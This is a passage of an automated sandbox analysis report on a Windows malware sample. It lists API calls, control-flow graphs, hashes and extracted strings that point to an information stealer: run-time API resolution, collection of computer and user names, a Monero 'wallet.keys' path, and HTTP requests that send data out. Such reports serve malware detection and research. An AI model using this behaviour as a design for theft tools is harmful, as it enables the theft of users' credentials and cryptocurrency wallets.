                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: 1d1248ed6719da1d6ec1873133f570a6f82f771cce3017a12b4efc30628f7ae4
                        • Instruction ID: a89aa886ca4c93e0ef0cfd555fb17bd5b8ef9f21b3191833d7c776eb9fff4404
                        • Opcode Fuzzy Hash: 1d1248ed6719da1d6ec1873133f570a6f82f771cce3017a12b4efc30628f7ae4
                        • Instruction Fuzzy Hash: 594105606C660CFAF63ABFE48DC2E9D77567F46B08F707864BA0052283DBB165029536

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 801 c44880-c44942 call c5a7a0 call c447b0 call c5a740 * 5 InternetOpenA StrCmpCA 816 c44944 801->816 817 c4494b-c4494f 801->817 816->817 818 c44955-c44acd call c58b60 call c5a920 call c5a8a0 call c5a800 * 2 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a920 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a920 call c5a8a0 call c5a800 * 2 InternetConnectA 817->818 819 c44ecb-c44ef3 InternetCloseHandle call c5aad0 call c49ac0 817->819 818->819 905 c44ad3-c44ad7 818->905 829 c44ef5-c44f2d call c5a820 call c5a9b0 call c5a8a0 call c5a800 819->829 830 c44f32-c44fa2 call c58990 * 2 call c5a7a0 call c5a800 * 8 819->830 829->830 906 c44ae5 905->906 907 c44ad9-c44ae3 905->907 908 c44aef-c44b22 HttpOpenRequestA 906->908 907->908 909 c44ebe-c44ec5 InternetCloseHandle 908->909 910 c44b28-c44e28 call c5a9b0 call c5a8a0 call c5a800 call c5a920 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a920 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a920 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a9b0 call c5a8a0 call c5a800 call c5a920 call c5a8a0 call c5a800 call c5a740 call c5a920 * 2 call c5a8a0 call c5a800 * 2 call c5aad0 lstrlen call c5aad0 * 2 lstrlen call c5aad0 HttpSendRequestA 908->910 909->819 1021 c44e32-c44e5c InternetReadFile 910->1021 1022 c44e67-c44eb9 InternetCloseHandle call c5a800 1021->1022 1023 c44e5e-c44e65 1021->1023 1022->909 1023->1022 1024 c44e69-c44ea7 call c5a9b0 call c5a8a0 call c5a800 1023->1024 1024->1021
                        APIs
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C44839
                          • Part of subcall function 00C447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C44849
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C44915
                        • StrCmpCA.SHLWAPI(?,008A0610), ref: 00C4493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C44ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C60DDB,00000000,?,?,00000000,?,",00000000,?,008A0700), ref: 00C44DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C44E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C44E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C44E49
                        • InternetCloseHandle.WININET(00000000), ref: 00C44EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00C44EC5
                        • HttpOpenRequestA.WININET(00000000,008A0720,?,0089FCA0,00000000,00000000,00400100,00000000), ref: 00C44B15
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • InternetCloseHandle.WININET(00000000), ref: 00C44ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: ebb020829a7a238b6a3be5a1416f2dd302a9225ea899454b38805a3e7aea5444
                        • Instruction ID: 1b93f76e8d785f57da1d7c2660f98387e6a8bd7475ed69750d080f1cb76701f7
                        • Opcode Fuzzy Hash: ebb020829a7a238b6a3be5a1416f2dd302a9225ea899454b38805a3e7aea5444
                        • Instruction Fuzzy Hash: BD120D75910218AADB14EB92DC92FEEB378BF14301F5442A9B50672091EF702F8DDF66
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C57910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C57917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00C5792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 3a9a3691aa14792f2d08bcb85730b8ebf66131c2edc5ea15ad71b0f21e25f6a9
                        • Instruction ID: 05b5f576540970129573c5c2b319bc1f50c4846f826d7c322523fa658e565595
                        • Opcode Fuzzy Hash: 3a9a3691aa14792f2d08bcb85730b8ebf66131c2edc5ea15ad71b0f21e25f6a9
                        • Instruction Fuzzy Hash: 540162B1904204EFD714DF95DD49FAAFBB8F704B11F10426AEA45A2280C37459488BA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C411B7), ref: 00C57880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C57887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C5789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: fee6109b4ba100f49e83a620240ac4e44069acb080cfe6089a8345718a34c645
                        • Instruction ID: b09492da5485d8ce4d4dd3ce5aaf2819d248688f09be1fa6908e79b6f7d01a20
                        • Opcode Fuzzy Hash: fee6109b4ba100f49e83a620240ac4e44069acb080cfe6089a8345718a34c645
                        • Instruction Fuzzy Hash: 6FF04FB1944208AFD714DF99DD49FAEBBB8EB04711F10026AFA05A2680C77515488BA1
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 60c7e5051518038c715cea137919cae061c90c7bf0ce08d1210671b0a4be7be3
                        • Instruction ID: 81f4bf12f92dc4076b0432233aed9b0d2910cfbf9a48db530934693c134715ea
                        • Opcode Fuzzy Hash: 60c7e5051518038c715cea137919cae061c90c7bf0ce08d1210671b0a4be7be3
                        • Instruction Fuzzy Hash: 99D05E7490030CDFDB00DFE1D8496EDBB78FB08311F040566DD0972340EA315486CBA6

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 c59c10-c59c1a 634 c5a036-c5a0ca LoadLibraryA * 8 633->634 635 c59c20-c5a031 GetProcAddress * 43 633->635 636 c5a146-c5a14d 634->636 637 c5a0cc-c5a141 GetProcAddress * 5 634->637 635->634 638 c5a216-c5a21d 636->638 639 c5a153-c5a211 GetProcAddress * 8 636->639 637->636 640 c5a21f-c5a293 GetProcAddress * 5 638->640 641 c5a298-c5a29f 638->641 639->638 640->641 642 c5a2a5-c5a332 GetProcAddress * 6 641->642 643 c5a337-c5a33e 641->643 642->643 644 c5a344-c5a41a GetProcAddress * 9 643->644 645 c5a41f-c5a426 643->645 644->645 646 c5a4a2-c5a4a9 645->646 647 c5a428-c5a49d GetProcAddress * 5 645->647 648 c5a4dc-c5a4e3 646->648 649 c5a4ab-c5a4d7 GetProcAddress * 2 646->649 647->646 650 c5a515-c5a51c 648->650 651 c5a4e5-c5a510 GetProcAddress * 2 648->651 649->648 652 c5a612-c5a619 650->652 653 c5a522-c5a60d GetProcAddress * 10 650->653 651->650 654 c5a67d-c5a684 652->654 655 c5a61b-c5a678 GetProcAddress * 4 652->655 653->652 656 c5a686-c5a699 GetProcAddress 654->656 657 c5a69e-c5a6a5 654->657 655->654 656->657 658 c5a6a7-c5a703 GetProcAddress * 4 657->658 659 c5a708-c5a709 657->659 658->659
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,008877D0), ref: 00C59C2D
                        • GetProcAddress.KERNEL32(74DD0000,00887690), ref: 00C59C45
                        • GetProcAddress.KERNEL32(74DD0000,0089B820), ref: 00C59C5E
                        • GetProcAddress.KERNEL32(74DD0000,0089B7C0), ref: 00C59C76
                        • GetProcAddress.KERNEL32(74DD0000,0089B7D8), ref: 00C59C8E
                        • GetProcAddress.KERNEL32(74DD0000,0089B7F0), ref: 00C59CA7
                        • GetProcAddress.KERNEL32(74DD0000,0088D7E8), ref: 00C59CBF
                        • GetProcAddress.KERNEL32(74DD0000,0089EDE0), ref: 00C59CD7
                        • GetProcAddress.KERNEL32(74DD0000,0089ECC0), ref: 00C59CF0
                        • GetProcAddress.KERNEL32(74DD0000,0089ED50), ref: 00C59D08
                        • GetProcAddress.KERNEL32(74DD0000,0089EE10), ref: 00C59D20
                        • GetProcAddress.KERNEL32(74DD0000,00887790), ref: 00C59D39
                        • GetProcAddress.KERNEL32(74DD0000,00887630), ref: 00C59D51
                        • GetProcAddress.KERNEL32(74DD0000,008877B0), ref: 00C59D69
                        • GetProcAddress.KERNEL32(74DD0000,00887810), ref: 00C59D82
                        • GetProcAddress.KERNEL32(74DD0000,0089EC48), ref: 00C59D9A
                        • GetProcAddress.KERNEL32(74DD0000,0089ED68), ref: 00C59DB2
                        • GetProcAddress.KERNEL32(74DD0000,0088D450), ref: 00C59DCB
                        • GetProcAddress.KERNEL32(74DD0000,00887830), ref: 00C59DE3
                        • GetProcAddress.KERNEL32(74DD0000,0089EC60), ref: 00C59DFB
                        • GetProcAddress.KERNEL32(74DD0000,0089ED08), ref: 00C59E14
                        • GetProcAddress.KERNEL32(74DD0000,0089ED80), ref: 00C59E2C
                        • GetProcAddress.KERNEL32(74DD0000,0089EC78), ref: 00C59E44
                        • GetProcAddress.KERNEL32(74DD0000,00887470), ref: 00C59E5D
                        • GetProcAddress.KERNEL32(74DD0000,0089EC30), ref: 00C59E75
                        • GetProcAddress.KERNEL32(74DD0000,0089EDC8), ref: 00C59E8D
                        • GetProcAddress.KERNEL32(74DD0000,0089ECF0), ref: 00C59EA6
                        • GetProcAddress.KERNEL32(74DD0000,0089ED38), ref: 00C59EBE
                        • GetProcAddress.KERNEL32(74DD0000,0089EEA0), ref: 00C59ED6
                        • GetProcAddress.KERNEL32(74DD0000,0089EC90), ref: 00C59EEF
                        • GetProcAddress.KERNEL32(74DD0000,0089EED0), ref: 00C59F07
                        • GetProcAddress.KERNEL32(74DD0000,0089ED98), ref: 00C59F1F
                        • GetProcAddress.KERNEL32(74DD0000,0089EEB8), ref: 00C59F38
                        • GetProcAddress.KERNEL32(74DD0000,0089C318), ref: 00C59F50
                        • GetProcAddress.KERNEL32(74DD0000,0089EC00), ref: 00C59F68
                        • GetProcAddress.KERNEL32(74DD0000,0089EDB0), ref: 00C59F81
                        • GetProcAddress.KERNEL32(74DD0000,00887850), ref: 00C59F99
                        • GetProcAddress.KERNEL32(74DD0000,0089EDF8), ref: 00C59FB1
                        • GetProcAddress.KERNEL32(74DD0000,00887490), ref: 00C59FCA
                        • GetProcAddress.KERNEL32(74DD0000,0089EE28), ref: 00C59FE2
                        • GetProcAddress.KERNEL32(74DD0000,0089EE40), ref: 00C59FFA
                        • GetProcAddress.KERNEL32(74DD0000,008874B0), ref: 00C5A013
                        • GetProcAddress.KERNEL32(74DD0000,00887890), ref: 00C5A02B
                        • LoadLibraryA.KERNEL32(0089ED20,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A03D
                        • LoadLibraryA.KERNEL32(0089EEE8,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A04E
                        • LoadLibraryA.KERNEL32(0089ECA8,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A060
                        • LoadLibraryA.KERNEL32(0089EE58,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A072
                        • LoadLibraryA.KERNEL32(0089EE70,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A083
                        • LoadLibraryA.KERNEL32(0089EE88,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A095
                        • LoadLibraryA.KERNEL32(0089EC18,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A0A7
                        • LoadLibraryA.KERNEL32(0089ECD8,?,00C55CA3,00C60AEB,?,?,?,?,?,?,?,?,?,?,00C60AEA,00C60AE3), ref: 00C5A0B8
                        • GetProcAddress.KERNEL32(75290000,00887A30), ref: 00C5A0DA
                        • GetProcAddress.KERNEL32(75290000,0089F110), ref: 00C5A0F2
                        • GetProcAddress.KERNEL32(75290000,0089ADC8), ref: 00C5A10A
                        • GetProcAddress.KERNEL32(75290000,0089F0E0), ref: 00C5A123
                        • GetProcAddress.KERNEL32(75290000,00887AF0), ref: 00C5A13B
                        • GetProcAddress.KERNEL32(6FDD0000,0088D4C8), ref: 00C5A160
                        • GetProcAddress.KERNEL32(6FDD0000,008878D0), ref: 00C5A179
                        • GetProcAddress.KERNEL32(6FDD0000,0088D770), ref: 00C5A191
                        • GetProcAddress.KERNEL32(6FDD0000,0089F068), ref: 00C5A1A9
                        • GetProcAddress.KERNEL32(6FDD0000,0089F0F8), ref: 00C5A1C2
                        • GetProcAddress.KERNEL32(6FDD0000,00887BF0), ref: 00C5A1DA
                        • GetProcAddress.KERNEL32(6FDD0000,00887930), ref: 00C5A1F2
                        • GetProcAddress.KERNEL32(6FDD0000,0089F008), ref: 00C5A20B
                        • GetProcAddress.KERNEL32(752C0000,00887AD0), ref: 00C5A22C
                        • GetProcAddress.KERNEL32(752C0000,00887A90), ref: 00C5A244
                        • GetProcAddress.KERNEL32(752C0000,0089F1D0), ref: 00C5A25D
                        • GetProcAddress.KERNEL32(752C0000,0089F128), ref: 00C5A275
                        • GetProcAddress.KERNEL32(752C0000,00887BB0), ref: 00C5A28D
                        • GetProcAddress.KERNEL32(74EC0000,0088D3B0), ref: 00C5A2B3
                        • GetProcAddress.KERNEL32(74EC0000,0088D860), ref: 00C5A2CB
                        • GetProcAddress.KERNEL32(74EC0000,0089EF78), ref: 00C5A2E3
                        • GetProcAddress.KERNEL32(74EC0000,00887970), ref: 00C5A2FC
                        • GetProcAddress.KERNEL32(74EC0000,00887950), ref: 00C5A314
                        • GetProcAddress.KERNEL32(74EC0000,0088D518), ref: 00C5A32C
                        • GetProcAddress.KERNEL32(75BD0000,0089F140), ref: 00C5A352
                        • GetProcAddress.KERNEL32(75BD0000,00887A50), ref: 00C5A36A
                        • GetProcAddress.KERNEL32(75BD0000,0089AE28), ref: 00C5A382
                        • GetProcAddress.KERNEL32(75BD0000,0089F158), ref: 00C5A39B
                        • GetProcAddress.KERNEL32(75BD0000,0089F098), ref: 00C5A3B3
                        • GetProcAddress.KERNEL32(75BD0000,00887B10), ref: 00C5A3CB
                        • GetProcAddress.KERNEL32(75BD0000,00887B30), ref: 00C5A3E4
                        • GetProcAddress.KERNEL32(75BD0000,0089F020), ref: 00C5A3FC
                        • GetProcAddress.KERNEL32(75BD0000,0089EF90), ref: 00C5A414
                        • GetProcAddress.KERNEL32(75A70000,008878F0), ref: 00C5A436
                        • GetProcAddress.KERNEL32(75A70000,0089EF00), ref: 00C5A44E
                        • GetProcAddress.KERNEL32(75A70000,0089F038), ref: 00C5A466
                        • GetProcAddress.KERNEL32(75A70000,0089EF18), ref: 00C5A47F
                        • GetProcAddress.KERNEL32(75A70000,0089EFD8), ref: 00C5A497
                        • GetProcAddress.KERNEL32(75450000,008878B0), ref: 00C5A4B8
                        • GetProcAddress.KERNEL32(75450000,00887BD0), ref: 00C5A4D1
                        • GetProcAddress.KERNEL32(75DA0000,00887C10), ref: 00C5A4F2
                        • GetProcAddress.KERNEL32(75DA0000,0089EF30), ref: 00C5A50A
                        • GetProcAddress.KERNEL32(6F070000,00887A70), ref: 00C5A530
                        • GetProcAddress.KERNEL32(6F070000,00887910), ref: 00C5A548
                        • GetProcAddress.KERNEL32(6F070000,00887990), ref: 00C5A560
                        • GetProcAddress.KERNEL32(6F070000,0089EF48), ref: 00C5A579
                        • GetProcAddress.KERNEL32(6F070000,008879B0), ref: 00C5A591
                        • GetProcAddress.KERNEL32(6F070000,00887870), ref: 00C5A5A9
                        • GetProcAddress.KERNEL32(6F070000,008879D0), ref: 00C5A5C2
                        • GetProcAddress.KERNEL32(6F070000,00887B50), ref: 00C5A5DA
                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00C5A5F1
                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00C5A607
                        • GetProcAddress.KERNEL32(75AF0000,0089F050), ref: 00C5A629
                        • GetProcAddress.KERNEL32(75AF0000,0089AD98), ref: 00C5A641
                        • GetProcAddress.KERNEL32(75AF0000,0089F080), ref: 00C5A659
                        • GetProcAddress.KERNEL32(75AF0000,0089F170), ref: 00C5A672
                        • GetProcAddress.KERNEL32(75D90000,008879F0), ref: 00C5A693
                        • GetProcAddress.KERNEL32(6E330000,0089F188), ref: 00C5A6B4
